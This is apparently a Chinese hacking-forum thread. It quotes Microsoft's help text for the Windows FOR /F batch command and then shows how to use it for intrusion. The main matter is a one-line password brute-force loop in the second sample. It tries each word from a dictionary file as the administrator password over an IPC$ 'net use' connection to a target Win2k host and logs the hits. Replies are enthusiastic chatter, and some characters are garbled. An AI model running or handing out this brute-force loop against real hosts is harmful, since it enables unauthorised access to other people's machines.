好难�

sample1: 
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command 

会分析 myfile.txt 中的每一行，忽略以分号打头的那些行，将 
每行中的第二个和第三个符号传递给 for 程序体；用逗号和/或 
空格定界符号。请注意，这个 for 程序体的语句引用 %i 来 
取得第二个符号，引用 %j 来取得第三个符号，引用 %k 
来取得第三个符号后的所有剩余符号。对于带有空格的文件 
名，您需要用双引号将文件名括起来。为了用这种方式来使 
用双引号，您还需要使用 usebackq 选项，否则，双引号会 
被理解成是用作定义某个要分析的字符串的。 

%i 专门在 for 语句中得到说明，%j 和 %k 是通过 
tokens= 选项专门得到说明的。您可以通过 tokens= 一行 
指定最多 26 个符号，只要不试图说明一个高于字母 \'z\' 或 
\'Z\' 的变量。请记住，FOR 变量是单一字母、分大小写和全局的； 
同时不能有 52 个以上都在使用中。 

您还可以在相邻字符串上使用 FOR /F 分析逻辑；方法是， 
用单引号将括号之间的 filenameset 括起来。这样，该字符 
串会被当作一个文件中的一个单一输入行。 

最后，您可以用 FOR /F 命令来分析命令的输出。方法是，将 
括号之间的 filenameset 变成一个反括字符串。该字符串会 
被当作命令行，传递到一个子 CMD.EXE，其输出会被抓进 
内存，并被当作文件分析。因此，以下例子: 

FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i 

会枚举当前环境中的环境变量名称。 

另外，FOR 变量参照的替换已被增强。您现在可以使用下列 
选项语法: 

~I - 删除任何引号(")，扩充 %I 
%~fI - 将 %I 扩充到一个完全合格的路径名 
%~dI - 仅将 %I 扩充到一个驱动器号 
%~pI - 仅将 %I 扩充到一个路径 
%~nI - 仅将 %I 扩充到一个文件名 
%~xI - 仅将 %I 扩充到一个文件扩展名 
%~sI - 扩充的路径只含有短名 
%~aI - 将 %I 扩充到文件的文件属性 
%~tI - 将 %I 扩充到文件的日期/时间 
%~zI - 将 %I 扩充到文件的大小 
%~$PATH:I - 查找列在路径环境变量的目录，并将 %I 扩充 
到找到的第一个完全合格的名称。如果环境变量 
未被定义，或者没有找到文件，此组合键会扩充 
空字符串 

可以组合修饰符来得到多重结果: 

%~dpI - 仅将 %I 扩充到一个驱动器号和路径 
%~nxI - 仅将 %I 扩充到一个文件名和扩展名 
%~fsI - 仅将 %I 扩充到一个带有短名的完整路径名 
%~dp$PATH:i - 查找列在路径环境变量的目录，并将 %I 扩充 
到找到的第一个驱动器号和路径。 
%~ftzaI - 将 %I 扩充到类似输出线路的 DIR 

在以上例子中，%I 和 PATH 可用其他有效数值代替。%~ 语 
用一个有效的 FOR 变量名终止。选取类似 %I 的大写变量名 
比较易读，而且避免与不分大小写的组合键混淆。 

以上是MS的官方帮助，下面我们举几个例子来具体说明一下For命令在入侵中的用途。 

sample2： 

利用For命令来实现对一台目标Win2k主机的暴力密码破解。 
我们用net use \\\\ip\\ipc$ "password" /u:"administrator"来尝试这和目标主机进行连接，当成功时记下密码。 
最主要的命令是一条：for /f i% in (dict.txt) do net use \\\\ip\\ipc$ "i%" /u:"administrator" 
用i%来表示admin的密码，在dict.txt中这个取i%的值用net use 命令来连接。然后将程序运行结果传递给find命令－－ 
for /f i%% in (dict.txt) do net use \\\\ip\\ipc$ "i%%" /u:"administrator"|find ":命令成功完成">>D:\\ok.txt ，这样就ko了。

.............
自己�

帮顶 ^_^

顶啊~~~
有些命令书上没有啊...

黑客吧转过来的
命令当然全了

呃..黑客吧
偶也去逛逛.......
将来颠覆微软全线产品打破垄断的重任就放在咱们这一代了....

我也想学 不过看不懂哦```
郁闷哦`

顶顶

我只能顶了，不能再多